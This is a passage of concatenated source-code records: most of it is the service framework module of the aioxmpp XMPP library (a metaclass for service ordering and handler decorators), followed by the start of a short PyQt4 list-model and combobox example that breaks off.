:attr:`ORDER_BEFORE`.\n\n This is primarily used internally to handle :attr:`ORDER_BEFORE` when\n summoning services.\n\n It is an error to manually define :attr:`PATCHED_ORDER_AFTER` in a class\n definition, doing so will raise a :class:`TypeError`.\n\n .. versionadded:: 0.9\n\n .. versionchanged:: 0.9\n\n The :attr:`ORDER_AFTER` and :attr:`ORDER_BEFORE` attribute do not\n change after class creation. In earlier versions they contained\n the transitive completion of the dependency relation.\n\n The following attribute was generated in earlier version of\n aioxmpp:\n\n .. attribute:: _DEPGRAPH_NODE\n\n For compatibility with earlier versions, a warning is issued\n when :attr:`_DEPGRAPH_NODE` is defined in a service class\n definition.\n\n This behaviour will be removed in aioxmpp 1.0.\n\n .. deprecated:: 0.11\n\n Dependency relationships must not have cycles; a cycle results in a\n :class:`ValueError` when the class causing the cycle is declared.\n\n .. note::\n\n Subclassing instances of :class:`Meta` is forbidden. Trying to do so\n will raise a :class:`TypeError`\n\n .. versionchanged:: 0.9\n\n Example::\n\n class Foo(metaclass=service.Meta):\n pass\n\n class Bar(metaclass=service.Meta):\n ORDER_BEFORE = [Foo]\n\n class Baz(metaclass=service.Meta):\n ORDER_BEFORE = [Bar]\n\n class Fourth(metaclass=service.Meta):\n ORDER_BEFORE = [Bar]\n\n ``Baz`` and ``Fourth`` will be instantiated before ``Bar`` and ``Bar`` will\n be instantiated before ``Foo``. There is no dependency relationship between\n ``Baz`` and ``Fourth``.\n \"\"\"\n\n def __new__(mcls, name, bases, namespace, inherit_dependencies=True):\n if \"SERVICE_BEFORE\" in namespace or \"SERVICE_AFTER\" in namespace:\n if \"ORDER_BEFORE\" in namespace or \"ORDER_AFTER\" in namespace:\n raise ValueError(\"declaration mixes old and new ordering \"\n \"attribute names (SERVICE_* vs. ORDER_*)\")\n warnings.warn(\n \"SERVICE_BEFORE/AFTER used on class; use ORDER_BEFORE/AFTER\",\n DeprecationWarning)\n try:\n namespace[\"ORDER_BEFORE\"] = namespace.pop(\"SERVICE_BEFORE\")\n except KeyError:\n pass\n try:\n namespace[\"ORDER_AFTER\"] = namespace.pop(\"SERVICE_AFTER\")\n except KeyError:\n pass\n\n if \"PATCHED_ORDER_AFTER\" in namespace:\n raise TypeError(\n \"PATCHED_ORDER_AFTER must not be defined manually. \"\n \"it is supplied automatically by the metaclass.\"\n )\n\n if \"_DEPGRAPH_NODE\" in namespace:\n warnings.warn(\n \"_DEPGRAPH_NODE should not be defined manually. \"\n \"In version before 0.11 it was supplied automatically by \"\n \"the metaclass and defining it raised TypeError.\"\n )\n\n if any(isinstance(mcls, base)\n for base in bases) and \"service_order_index\" in namespace:\n raise TypeError(\n \"service_order_index must not be defined manually. \"\n \"It is supplied automatically by the metaclass.\"\n )\n\n for base in bases:\n if isinstance(base, Meta) and base is not Service:\n raise TypeError(\n \"subclassing services is prohibited.\"\n )\n\n for base in bases:\n if hasattr(base, \"SERVICE_HANDLERS\") and base.SERVICE_HANDLERS:\n raise TypeError(\n \"inheritance from service class with handlers is forbidden\"\n )\n\n namespace[\"ORDER_BEFORE\"] = frozenset(\n namespace.get(\"ORDER_BEFORE\", ()))\n namespace[\"ORDER_AFTER\"] = frozenset(\n namespace.get(\"ORDER_AFTER\", ()))\n namespace[\"PATCHED_ORDER_AFTER\"] = namespace[\"ORDER_AFTER\"]\n\n if namespace[\"ORDER_BEFORE\"] and namespace[\"ORDER_AFTER\"]:\n visited = set()\n for item in namespace[\"PATCHED_ORDER_AFTER\"]:\n if item.orders_after_any(namespace[\"ORDER_BEFORE\"],\n visited=visited):\n raise ValueError(\"dependency loop in service definitions\")\n\n SERVICE_HANDLERS = []\n existing_handlers = set()\n\n for attr_name, attr_value in namespace.items():\n if has_magic_attr(attr_value):\n new_handlers = get_magic_attr(attr_value)\n\n unique_handlers = {\n spec.key\n for spec in new_handlers\n if spec.is_unique\n }\n\n conflicting = unique_handlers & existing_handlers\n if conflicting:\n key = next(iter(conflicting))\n obj = next(iter(\n obj\n for obj_key, obj, _ in SERVICE_HANDLERS\n if obj_key == key\n ))\n\n raise TypeError(\n \"handler conflict between {!r} and {!r}: \"\n \"both want to use {!r}\".format(\n obj,\n attr_value,\n key,\n )\n )\n\n existing_handlers |= unique_handlers\n\n for spec, kwargs in new_handlers.items():\n missing = spec.require_deps - namespace[\"ORDER_AFTER\"]\n if missing:\n raise TypeError(\n \"decorator requires dependency {!r} \"\n \"but it is not declared\".format(\n next(iter(missing))\n )\n )\n\n SERVICE_HANDLERS.append(\n (spec.key, attr_value, kwargs)\n )\n\n elif isinstance(attr_value, Descriptor):\n missing = set(attr_value.required_dependencies) - \\\n namespace[\"ORDER_AFTER\"]\n if missing:\n raise TypeError(\n \"descriptor requires dependency {!r} \"\n \"but it is not declared\".format(\n next(iter(missing)),\n )\n )\n\n SERVICE_HANDLERS.append(attr_value)\n\n namespace[\"SERVICE_HANDLERS\"] = tuple(SERVICE_HANDLERS)\n\n return super().__new__(mcls, name, bases, namespace)\n\n def __init__(self, name, bases, namespace, inherit_dependencies=True):\n super().__init__(name, bases, namespace)\n for cls in self.ORDER_BEFORE:\n cls.PATCHED_ORDER_AFTER |= frozenset([self])\n\n def __prepare__(*args, **kwargs):\n return collections.OrderedDict()\n\n @property\n def SERVICE_BEFORE(self):\n return self.ORDER_BEFORE\n\n @property\n def SERVICE_AFTER(self):\n return self.ORDER_AFTER\n\n def orders_after(self, other, *, visited=None):\n \"\"\"\n Return whether `self` depends on `other` and will be instantiated\n later.\n\n :param other: Another service.\n :type other: :class:`aioxmpp.service.Service`\n\n .. versionadded:: 0.11\n \"\"\"\n return self.orders_after_any(frozenset([other]), visited=visited)\n\n def orders_after_any(self, other, *, visited=None):\n \"\"\"\n Return whether `self` orders after any of the services in the set\n `other`.\n\n :param other: Another service.\n :type other: A :class:`set` of\n :class:`aioxmpp.service.Service` instances\n\n .. versionadded:: 0.11\n \"\"\"\n if not other:\n return False\n if visited is None:\n visited = set()\n elif self in visited:\n return False\n visited.add(self)\n for item in self.PATCHED_ORDER_AFTER:\n if item in visited:\n continue\n if item in other:\n return True\n if item.orders_after_any(other, visited=visited):\n return True\n return False\n\n def independent_from(self, other):\n \"\"\"\n Return whether the services are independent (neither depends on\n the other).\n\n :param other: Another service.\n :type other: :class:`aioxmpp.service.Service`\n\n .. versionadded:: 0.11\n \"\"\"\n if self is other:\n return False\n return not self.orders_after(other) and not other.orders_after(self)\n\n\nclass Service(metaclass=Meta):\n \"\"\"\n A :class:`Service` is used to implement XMPP or XEP protocol parts, on top\n of the more or less fixed stanza handling implemented in\n :mod:`aioxmpp.node` and :mod:`aioxmpp.stream`.\n\n :class:`Service` is a base class which can be used by extension developers\n to implement support for custom or standardized protocol extensions. Some\n of the features for which :mod:`aioxmpp` has support are also implemented\n using :class:`Service` subclasses.\n\n `client` must be a :class:`~.Client` to which the service will be attached.\n The `client` cannot be changed later, for the sake of simplicity.\n\n `logger_base` may be a :class:`logging.Logger` instance or :data:`None`. If\n it is :data:`None`, a logger is automatically created, by taking the fully\n qualified name of the :class:`Service` subclass which is being\n instantiated. Otherwise, the logger is passed to :meth:`derive_logger` and\n the result is used as value for the :attr:`logger` attribute.\n\n To implement your own service, derive from :class:`Service`. If your\n service depends on other services (such as :mod:`aioxmpp.pubsub` or\n :mod:`aioxmpp.disco`), these dependencies *must* be declared as documented\n in the service meta class :class:`Meta`.\n\n To stay forward compatible, accept arbitrary keyword arguments and pass\n them down to :class:`Service`. As it is not possible to directly pass\n arguments to :class:`Service`\\\\ s on construction (due to the way\n :meth:`aioxmpp.Client.summon` works), there is no need for you\n to introduce custom arguments, and thus there should be no conflicts.\n\n .. note::\n\n Inheritance from classes which subclass :class:`Service` is forbidden.\n\n .. versionchanged:: 0.9\n\n .. autoattribute:: client\n\n .. autoattribute:: dependencies\n\n .. autoattribute:: service_order_index\n\n .. automethod:: derive_logger\n\n .. automethod:: shutdown\n \"\"\"\n\n def __init__(self, client, *, logger_base=None, dependencies={},\n service_order_index=0):\n if logger_base is None:\n self.logger = logging.getLogger(\".\".join([\n type(self).__module__, type(self).__qualname__\n ]))\n else:\n self.logger = self.derive_logger(logger_base)\n\n super().__init__()\n self.__context = contextlib.ExitStack()\n self.__client = client\n self.__dependencies = dependencies\n self.__service_order_index = service_order_index\n\n for item in self.SERVICE_HANDLERS:\n if isinstance(item, Descriptor):\n item.add_to_stack(self, self.__context)\n else:\n (handler_cm, additional_args), obj, kwargs = item\n self.__context.enter_context(\n handler_cm(\n self,\n self.__client.stream,\n obj.__get__(self, type(self)),\n *additional_args,\n **kwargs\n )\n )\n\n @property\n def service_order_index(self):\n \"\"\"\n Return the index of this service in the toposort of summoned\n services. This is primarily used to order filter chain\n registrations consistently with the dependency relationship of\n the services.\n\n .. versionadded:: 0.11\n \"\"\"\n return self.__service_order_index\n\n def derive_logger(self, logger):\n \"\"\"\n Return a child of `logger` specific for this instance. This is called\n after :attr:`client` has been set, from the constructor.\n\n The child name is calculated by the default implementation in a way\n specific for aioxmpp services; it is not meant to be used by\n non-:mod:`aioxmpp` classes; do not rely on the way how the child name\n is calculated.\n \"\"\"\n parts = type(self).__module__.split(\".\")[1:]\n if parts[-1] == \"service\" and len(parts) > 1:\n del parts[-1]\n\n return logger.getChild(\".\".join(\n parts+[type(self).__qualname__]\n ))\n\n @property\n def client(self):\n \"\"\"\n The client to which the :class:`Service` is bound. This attribute is\n read-only.\n\n If the service has been shut down using :meth:`shutdown`, this reads as\n :data:`None`.\n \"\"\"\n return self.__client\n\n @property\n def dependencies(self):\n \"\"\"\n When the service is instantiated through\n :meth:`~.Client.summon`, this attribute holds a mapping which maps the\n service classes contained in the :attr:`~.Meta.ORDER_AFTER` attribute\n to the respective instances related to the :attr:`client`.\n\n This is the preferred way to obtain dependencies specified via\n :attr:`~.Meta.ORDER_AFTER`.\n \"\"\"\n return self.__dependencies\n\n async def _shutdown(self):\n \"\"\"\n Actual implementation of the shut down process.\n\n This *must* be called using super from inheriting classes after their\n own shutdown procedure. Inheriting classes *must* override this method\n instead of :meth:`shutdown`.\n \"\"\"\n\n async def shutdown(self):\n \"\"\"\n Close the service and wait for it to completely shut down.\n\n Some services which are still running may depend on this service. In\n that case, the service may refuse to shut down instead of shutting\n down, by raising a :class:`RuntimeError` exception.\n\n .. note::\n\n Developers creating subclasses of :class:`Service` to implement\n services should not override this method. Instead, they should\n override the :meth:`_shutdown` method.\n\n \"\"\"\n await self._shutdown()\n self.__context.close()\n self.__client = None\n\n\nclass HandlerSpec(collections.namedtuple(\n \"HandlerSpec\",\n [\n \"is_unique\",\n \"key\",\n \"require_deps\",\n ])):\n \"\"\"\n Specification of the effects of the decorator at initialisation and shutdown\n time.\n\n :param key: Context manager and arguments pair.\n :type key: pair\n :param is_unique: Whether multiple identical `key` values are allowed on a\n single class.\n :type is_unique: :class:`bool`\n :param require_deps: Dependent services which are required for the\n decorator to work.\n :type require_deps: iterable of :class:`Service` classes\n\n During initialisation of the :class:`Service` which has a method using a\n given handler spec, the first part of the `key` pair is called with the\n service instance as first, the client :class:`StanzaStream` as second and\n the bound method as third argument. The second part of the `key` is\n unpacked as additional positional arguments.\n\n The result of the call must be a context manager, which is immediately\n entered. On shutdown, the context manager is exited.\n\n An example use would be the following handler spec::\n\n HandlerSpec(\n (func, (IQType.GET, some_payload_class)),\n is_unique=True,\n )\n\n where ``func`` is a context manager which takes a service instance, a\n stanza stream, a bound method as well as an IQ type and a payload class. On\n enter, the context manager would register the method it received as third\n argument on the stanza stream (second argument) as handler for the given IQ\n type and payload class (fourth and fifth arguments).\n\n If `is_unique` is true and several methods have :class:`HandlerSpec`\n objects with the same `key`, :class:`TypeError` is raised at class\n definition time.\n\n If at class definition time any of the dependent classes in `require_deps`\n are not declared using the order attributes (see :class:`Meta`), a\n :class:`TypeError` is raised.\n\n There is a property to extract the function directly:\n\n .. autoattribute:: func\n \"\"\"\n\n def __new__(cls, key, is_unique=True, require_deps=()):\n return super().__new__(cls, is_unique, key, frozenset(require_deps))\n\n @property\n def func(self):\n \"\"\"\n The factory of the context manager for this handler.\n\n .. versionadded:: 0.11\n \"\"\"\n return self.key[0]\n\n\ndef add_handler_spec(f, handler_spec, *, kwargs=None):\n \"\"\"\n Attach a handler specification (see :class:`HandlerSpec`) to a function.\n\n :param f: Function to attach the handler specification to.\n :param handler_spec: Handler specification to attach to the function.\n :type handler_spec: :class:`HandlerSpec`\n :param kwargs: additional keyword arguments passed to the function\n carried in the handler spec.\n :type kwargs: :class:`dict`\n\n :raises ValueError: if the handler was registered with\n different `kwargs` before\n\n This uses a private attribute, whose exact name is an implementation\n detail. The `handler_spec` is stored in a :class:`dict` bound to the\n attribute.\n\n .. versionadded:: 0.11\n\n The `kwargs` argument. If two handlers with the same spec, but\n different arguments are registered for one function, an error\n will be raised. So you should always include all possible\n arguments, this is the responsibility of the calling decorator.\n \"\"\"\n handler_dict = automake_magic_attr(f)\n if kwargs is None:\n kwargs = {}\n if kwargs != handler_dict.setdefault(handler_spec, kwargs):\n raise ValueError(\n \"The additional keyword arguments to the handler are incompatible\")\n\n\ndef _apply_iq_handler(instance, stream, func, type_, payload_cls, *,\n with_send_reply=False):\n return aioxmpp.stream.iq_handler(stream, type_, payload_cls, func,\n with_send_reply=with_send_reply)\n\n\ndef _apply_presence_handler(instance, stream, func, type_, from_):\n return aioxmpp.stream.presence_handler(stream, type_, from_, func)\n\n\ndef _apply_inbound_message_filter(instance, stream, func):\n return aioxmpp.stream.stanza_filter(\n stream.service_inbound_message_filter,\n func,\n instance.service_order_index,\n )\n\n\ndef _apply_inbound_presence_filter(instance, stream, func):\n return aioxmpp.stream.stanza_filter(\n stream.service_inbound_presence_filter,\n func,\n instance.service_order_index,\n )\n\n\ndef _apply_outbound_message_filter(instance, stream, func):\n return aioxmpp.stream.stanza_filter(\n stream.service_outbound_message_filter,\n func,\n instance.service_order_index,\n )\n\n\ndef _apply_outbound_presence_filter(instance, stream, func):\n return aioxmpp.stream.stanza_filter(\n stream.service_outbound_presence_filter,\n func,\n instance.service_order_index,\n )\n\n\ndef _apply_connect_depsignal(instance, stream, func, dependency, signal_name,\n mode):\n if dependency is aioxmpp.stream.StanzaStream:\n dependency = instance.client.stream\n elif dependency is aioxmpp.node.Client:\n dependency = instance.client\n else:\n dependency = instance.dependencies[dependency]\n signal = getattr(dependency, signal_name)\n if mode is None:\n return signal.context_connect(func)\n else:\n try:\n mode_func, args = mode\n except TypeError:\n pass\n else:\n mode = mode_func(*args)\n return signal.context_connect(func, mode)\n\n\ndef _apply_connect_depfilter(instance, stream, func, dependency, filter_name):\n if dependency is aioxmpp.stream.StanzaStream:\n dependency = instance.client.stream\n else:\n dependency = instance.dependencies[dependency]\n filter_ = getattr(dependency, filter_name)\n return filter_.context_register(func, instance.service_order_index)\n\n\ndef _apply_connect_attrsignal(instance, stream, func, descriptor, signal_name,\n mode):\n obj = descriptor.__get__(instance, type(instance))\n signal = getattr(obj, signal_name)\n if mode is None:\n return signal.context_connect(func)\n else:\n try:\n mode_func, args = mode\n except TypeError:\n pass\n else:\n mode = mode_func(*args)\n return signal.context_connect(func, mode)\n\n\ndef iq_handler(type_, payload_cls, *, with_send_reply=False):\n \"\"\"\n Register the decorated function or coroutine function as IQ request\n handler.\n\n :param type_: IQ type to listen for\n :type type_: :class:`~.IQType`\n :param payload_cls: Payload XSO class to listen for\n :type payload_cls: :class:`~.XSO` subclass\n :param with_send_reply: Whether to pass a function to send a reply\n to the decorated callable as second argument.\n :type with_send_reply: :class:`bool`\n\n :raises ValueError: if `payload_cls` is not a registered IQ payload\n\n If the decorated function is not a coroutine function, it must return an\n awaitable instead.\n\n .. seealso::\n\n :meth:`~.StanzaStream.register_iq_request_handler` for more\n details on the `type_`, `payload_cls` and\n `with_send_reply` arguments, as well as behaviour expected\n from the decorated function.\n\n :meth:`aioxmpp.IQ.as_payload_class`\n for a way to register a XSO as IQ payload\n\n .. versionadded:: 0.11\n\n The `with_send_reply` argument.\n\n .. versionchanged:: 0.10\n\n The decorator now checks if `payload_cls` is a valid, registered IQ\n payload and raises :class:`ValueError` if not.\n \"\"\"\n\n if (not hasattr(payload_cls, \"TAG\") or\n (aioxmpp.IQ.CHILD_MAP.get(payload_cls.TAG) is not\n aioxmpp.IQ.payload.xq_descriptor) or\n payload_cls not in aioxmpp.IQ.payload._classes):\n raise ValueError(\n \"{!r} is not a valid IQ payload \"\n \"(use IQ.as_payload_class decorator)\".format(\n payload_cls,\n )\n )\n\n def decorator(f):\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_iq_handler, (type_, payload_cls)),\n require_deps=(),\n ),\n kwargs=dict(with_send_reply=with_send_reply),\n )\n return f\n return decorator\n\n\ndef message_handler(type_, from_):\n \"\"\"\n Deprecated alias of :func:`.dispatcher.message_handler`.\n\n .. deprecated:: 0.9\n \"\"\"\n import aioxmpp.dispatcher\n return aioxmpp.dispatcher.message_handler(type_, from_)\n\n\ndef presence_handler(type_, from_):\n \"\"\"\n Deprecated alias of :func:`.dispatcher.presence_handler`.\n\n .. deprecated:: 0.9\n \"\"\"\n import aioxmpp.dispatcher\n return aioxmpp.dispatcher.presence_handler(type_, from_)\n\n\ndef inbound_message_filter(f):\n \"\"\"\n Register the decorated function as a service-level inbound message filter.\n\n :raise TypeError: if the decorated object is a coroutine function\n\n .. seealso::\n\n :class:`StanzaStream`\n for important remarks regarding the use of stanza filters.\n\n \"\"\"\n\n if asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"inbound_message_filter must not be a coroutine function\"\n )\n\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_inbound_message_filter, ())\n ),\n )\n return f\n\n\ndef inbound_presence_filter(f):\n \"\"\"\n Register the decorated function as a service-level inbound presence filter.\n\n :raise TypeError: if the decorated object is a coroutine function\n\n .. seealso::\n\n :class:`StanzaStream`\n for important remarks regarding the use of stanza filters.\n\n \"\"\"\n\n if asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"inbound_presence_filter must not be a coroutine function\"\n )\n\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_inbound_presence_filter, ())\n ),\n )\n return f\n\n\ndef outbound_message_filter(f):\n \"\"\"\n Register the decorated function as a service-level outbound message filter.\n\n :raise TypeError: if the decorated object is a coroutine function\n\n .. seealso::\n\n :class:`StanzaStream`\n for important remarks regarding the use of stanza filters.\n\n \"\"\"\n\n if asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"outbound_message_filter must not be a coroutine function\"\n )\n\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_outbound_message_filter, ())\n ),\n )\n return f\n\n\ndef outbound_presence_filter(f):\n \"\"\"\n Register the decorated function as a service-level outbound presence\n filter.\n\n :raise TypeError: if the decorated object is a coroutine function\n\n .. seealso::\n\n :class:`StanzaStream`\n for important remarks regarding the use of stanza filters.\n\n \"\"\"\n\n if asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"outbound_presence_filter must not be a coroutine function\"\n )\n\n add_handler_spec(\n f,\n HandlerSpec(\n (_apply_outbound_presence_filter, ())\n ),\n )\n return f\n\n\ndef _signal_connect_mode(signal, f, defer):\n if isinstance(signal, aioxmpp.callbacks.SyncSignal):\n if not asyncio.iscoroutinefunction(f):\n raise TypeError(\n \"a coroutine function is required for this signal\"\n )\n if defer:\n raise ValueError(\n \"cannot use defer with this signal\"\n )\n mode = None\n else:\n if asyncio.iscoroutinefunction(f):\n if defer:\n mode = aioxmpp.callbacks.AdHocSignal.SPAWN_WITH_LOOP, (None,)\n else:\n raise TypeError(\n \"cannot use coroutine function with this signal\"\n \" without defer\"\n )\n elif defer:\n mode = aioxmpp.callbacks.AdHocSignal.ASYNC_WITH_LOOP, (None,)\n else:\n mode = aioxmpp.callbacks.AdHocSignal.STRONG\n\n return mode\n\n\ndef _depsignal_spec(class_, signal_name, f, defer):\n signal = getattr(class_, signal_name)\n\n mode = _signal_connect_mode(signal, f, defer)\n\n if (class_ is not aioxmpp.stream.StanzaStream and\n class_ is not aioxmpp.node.Client):\n deps = (class_,)\n else:\n deps = ()\n\n return HandlerSpec(\n (\n _apply_connect_depsignal,\n (\n class_,\n signal_name,\n mode,\n )\n ),\n require_deps=deps,\n )\n\n\ndef depsignal(class_, signal_name, *, defer=False):\n \"\"\"\n Connect the decorated method or coroutine method to the addressed signal on\n a class on which the service depends.\n\n :param class_: A service class which is listed in the\n :attr:`~.Meta.ORDER_AFTER` relationship.\n :type class_: :class:`Service` class or one of the special cases below\n :param signal_name: Attribute name of the signal to connect to\n :type signal_name: :class:`str`\n :param defer: Flag indicating whether deferred execution of the decorated\n method is desired; see below for details.\n :type defer: :class:`bool`\n\n The signal is discovered by accessing the attribute with the name\n `signal_name` on the given `class_`. In addition, the following arguments\n are supported for `class_`:\n\n 1. :class:`aioxmpp.stream.StanzaStream`: the corresponding signal of the\n stream of the client running the service is used.\n\n 2. :class:`aioxmpp.Client`: the corresponding signal of the client running\n the service is used.\n\n If the signal is a :class:`.callbacks.Signal` and `defer` is false, the\n decorated object is connected using the default\n :attr:`~.callbacks.AdHocSignal.STRONG` mode.\n\n If the signal is a :class:`.callbacks.Signal` and `defer` is true and the\n decorated object is a coroutine function, the\n :attr:`~.callbacks.AdHocSignal.SPAWN_WITH_LOOP` mode with the default\n asyncio event loop is used. If the decorated object is not a coroutine\n function, :attr:`~.callbacks.AdHocSignal.ASYNC_WITH_LOOP` is used instead.\n\n If the signal is a :class:`.callbacks.SyncSignal`, `defer` must be false\n and the decorated object must be a coroutine function.\n\n .. versionchanged:: 0.9\n\n Support for :class:`aioxmpp.stream.StanzaStream` and\n :class:`aioxmpp.Client` as `class_` argument was added.\n \"\"\"\n\n def decorator(f):\n add_handler_spec(\n f,\n _depsignal_spec(class_, signal_name, f, defer)\n )\n return f\n return decorator\n\n\ndef _attrsignal_spec(descriptor, signal_name, f, defer):\n signal = getattr(descriptor.value_type, signal_name)\n mode = _signal_connect_mode(signal, f, defer)\n\n return HandlerSpec(\n (\n _apply_connect_attrsignal,\n (\n descriptor,\n signal_name,\n mode\n )\n ),\n is_unique=True,\n require_deps=(),\n )\n\n\ndef attrsignal(descriptor, signal_name, *, defer=False):\n \"\"\"\n Connect the decorated method or coroutine method to the addressed signal on\n a descriptor.\n\n :param descriptor: The descriptor to connect to.\n :type descriptor: :class:`Descriptor` subclass.\n :param signal_name: Attribute name of the signal to connect to\n :type signal_name: :class:`str`\n :param defer: Flag indicating whether deferred execution of the decorated\n method is desired; see below for details.\n :type defer: :class:`bool`\n\n The signal is discovered by accessing the attribute with the name\n `signal_name` on the :attr:`~Descriptor.value_type` of the `descriptor`.\n\n During instantiation of the service, the value of the descriptor is used\n to obtain the signal and then the decorated method is connected to the\n signal.\n\n If the signal is a :class:`.callbacks.Signal` and `defer` is false, the\n decorated object is connected using the default\n :attr:`~.callbacks.AdHocSignal.STRONG` mode.\n\n If the signal is a :class:`.callbacks.Signal` and `defer` is true and the\n decorated object is a coroutine function, the\n :attr:`~.callbacks.AdHocSignal.SPAWN_WITH_LOOP` mode with the default\n asyncio event loop is used. If the decorated object is not a coroutine\n function, :attr:`~.callbacks.AdHocSignal.ASYNC_WITH_LOOP` is used instead.\n\n If the signal is a :class:`.callbacks.SyncSignal`, `defer` must be false\n and the decorated object must be a coroutine function.\n\n .. versionadded:: 0.9\n \"\"\"\n def decorator(f):\n add_handler_spec(\n f,\n _attrsignal_spec(descriptor, signal_name, f, defer)\n )\n return f\n return decorator\n\n\ndef _depfilter_spec(class_, filter_name):\n require_deps = ()\n if class_ is not aioxmpp.stream.StanzaStream:\n require_deps = (class_,)\n\n return HandlerSpec(\n (\n _apply_connect_depfilter,\n (\n class_,\n filter_name,\n )\n ),\n is_unique=True,\n require_deps=require_deps,\n )\n\n\ndef depfilter(class_, filter_name):\n \"\"\"\n Register the decorated method at the addressed :class:`~.callbacks.Filter`\n on a class on which the service depends.\n\n :param class_: A service class which is listed in the\n :attr:`~.Meta.ORDER_AFTER` relationship.\n :type class_: :class:`Service` class or\n :class:`aioxmpp.stream.StanzaStream`\n :param filter_name: Attribute name of the filter to register at\n :type filter_name: :class:`str`\n\n The filter at which the decorated method is registered is discovered by\n accessing the attribute with the name `filter_name` on the instance of the\n dependent class `class_`. If `class_` is\n :class:`aioxmpp.stream.StanzaStream`, the filter is searched for on the\n stream (and no dependendency needs to be declared).\n\n .. versionadded:: 0.9\n \"\"\"\n spec = _depfilter_spec(class_, filter_name)\n\n def decorator(f):\n add_handler_spec(\n f,\n spec,\n )\n return f\n\n return decorator\n\n\ndef is_iq_handler(type_, payload_cls, coro, *, with_send_reply=False):\n \"\"\"\n Return true if `coro` has been decorated with :func:`iq_handler` for the\n given `type_` and `payload_cls` and the specified keyword arguments.\n \"\"\"\n\n try:\n handlers = get_magic_attr(coro)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_iq_handler, (type_, payload_cls)),\n )\n\n try:\n return handlers[hs] == dict(with_send_reply=with_send_reply)\n except KeyError:\n return False\n\n\ndef is_message_handler(type_, from_, cb):\n \"\"\"\n Deprecated alias of :func:`.dispatcher.is_message_handler`.\n\n .. deprecated:: 0.9\n \"\"\"\n import aioxmpp.dispatcher\n return aioxmpp.dispatcher.is_message_handler(type_, from_, cb)\n\n\ndef is_presence_handler(type_, from_, cb):\n \"\"\"\n Deprecated alias of :func:`.dispatcher.is_presence_handler`.\n\n .. deprecated:: 0.9\n \"\"\"\n import aioxmpp.dispatcher\n return aioxmpp.dispatcher.is_presence_handler(type_, from_, cb)\n\n\ndef is_inbound_message_filter(cb):\n \"\"\"\n Return true if `cb` has been decorated with :func:`inbound_message_filter`.\n \"\"\"\n\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_inbound_message_filter, ())\n )\n\n return hs in handlers\n\n\ndef is_inbound_presence_filter(cb):\n \"\"\"\n Return true if `cb` has been decorated with\n :func:`inbound_presence_filter`.\n \"\"\"\n\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_inbound_presence_filter, ())\n )\n\n return hs in handlers\n\n\ndef is_outbound_message_filter(cb):\n \"\"\"\n Return true if `cb` has been decorated with\n :func:`outbound_message_filter`.\n \"\"\"\n\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_outbound_message_filter, ())\n )\n\n return hs in handlers\n\n\ndef is_outbound_presence_filter(cb):\n \"\"\"\n Return true if `cb` has been decorated with\n :func:`outbound_presence_filter`.\n \"\"\"\n\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n hs = HandlerSpec(\n (_apply_outbound_presence_filter, ())\n )\n\n return hs in handlers\n\n\ndef is_depsignal_handler(class_, signal_name, cb, *, defer=False):\n \"\"\"\n Return true if `cb` has been decorated with :func:`depsignal` for the given\n signal, class and connection mode.\n \"\"\"\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n return _depsignal_spec(class_, signal_name, cb, defer) in handlers\n\n\ndef is_depfilter_handler(class_, filter_name, filter_):\n \"\"\"\n Return true if `filter_` has been decorated with :func:`depfilter` for the\n given filter and class.\n \"\"\"\n try:\n handlers = get_magic_attr(filter_)\n except AttributeError:\n return False\n\n return _depfilter_spec(class_, filter_name) in handlers\n\n\ndef is_attrsignal_handler(descriptor, signal_name, cb, *, defer=False):\n \"\"\"\n Return true if `cb` has been decorated with :func:`attrsignal` for the\n given signal, descriptor and connection mode.\n \"\"\"\n try:\n handlers = get_magic_attr(cb)\n except AttributeError:\n return False\n\n return _attrsignal_spec(descriptor, signal_name, cb, defer) in handlers\n","repo_name":"horazont/aioxmpp","sub_path":"aioxmpp/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":49185,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"21"} +{"seq_id":"74865928053","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui\n\n\nclass Model(QtCore.QAbstractListModel):\n def __init__(self, *args, **kwargs):\n QtCore.QAbstractListModel.__init__(self, *args, **kwargs)\n self.items = []\n\n def rowCount(self, parent=QtCore.QModelIndex()):\n return len(self.items)\n\n def data(self, index, role=QtCore.Qt.DisplayRole):\n if index.isValid() is True:\n if role == QtCore.Qt.DisplayRole:\n return QtCore.QVariant(self.items[index.row()])\n elif role == QtCore.Qt.ItemDataRole:\n return QtCore.QVariant(self.items[index.row()])\n return QtCore.QVariant()\n\n def itemsAdded(self, items):\n # insert items into their sorted position\n items = sorted(items)\n row = 0\n while row < len(self.items) and len(items) > 0:\n if items[0] < self.items[row]:\n self.beginInsertRows(QtCore.QModelIndex(), row, row)\n self.items.insert(row, items.pop(0))\n self.endInsertRows()\n row += 1\n row += 1\n # add remaining items to end of the list\n if len(items) > 0:\n self.beginInsertRows(\n QtCore.QModelIndex(),\n len(self.items),\n len(self.items) + len(items) - 1\n )\n self.items.extend(items)\n self.endInsertRows()\n\n def itemsRemoved(self, items):\n # remove items from the list\n for item in items:\n for row in range(0, len(self.items)):\n if self.items[row] == item:\n self.beginRemoveRows(QtCore.QModelIndex(), row, row)\n self.items.pop(row)\n self.endRemoveRows()\n break\n\n\ndef main():\n app = QtGui.QApplication([])\n w = QtGui.QWidget()\n w.resize(300, 200)\n layout = QtGui.QVBoxLayout()\n\n model = Model()\n model.itemsAdded(['a', 'b', 'd', 'e'])\n\n combobox = QtGui.QComboBox()\n combobox.setModel(model)\n combobox.setCurrentIndex(3)\n layout.addWidget(combobox)\n\n def insertC(self):\n model.itemsAdded('c')\n\n def removeC(self):\n model.itemsRemoved('c')\n\n 